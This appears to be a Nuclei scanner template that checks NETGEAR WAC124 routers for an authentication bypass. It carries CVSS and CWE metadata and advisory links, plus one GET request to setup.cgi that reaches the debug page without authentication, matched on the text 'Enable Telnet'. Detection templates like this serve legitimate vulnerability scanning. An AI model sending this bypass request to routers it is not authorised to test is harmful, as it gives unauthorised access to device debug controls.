id: netgear-wac124-router-auth-bypass info: name: NETGEAR WAC124 - Authentication Bypass author: gy741 severity: high description: | NETGEAR WAC124 AC2000 routers contain an authentication bypass vulnerability. An attacker can gain access by bypassing proper authentication, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc - https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cwe-id: CWE-287 metadata: max-request: 1 tags: netgear,auth-bypass,router,iot http: - method: GET path: - "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "Enable Telnet" # digest: 4a0a0047304502210094026e2cfc42c48edc07c9f47adf06adedda5e435ce53660957b4e6d908dc44d022028c9f7c710ff5bd541f6b4e6bf7547e3424108a13469d48ced1e028fd4392f6a:922c64590222798bb761d5b6d8e72950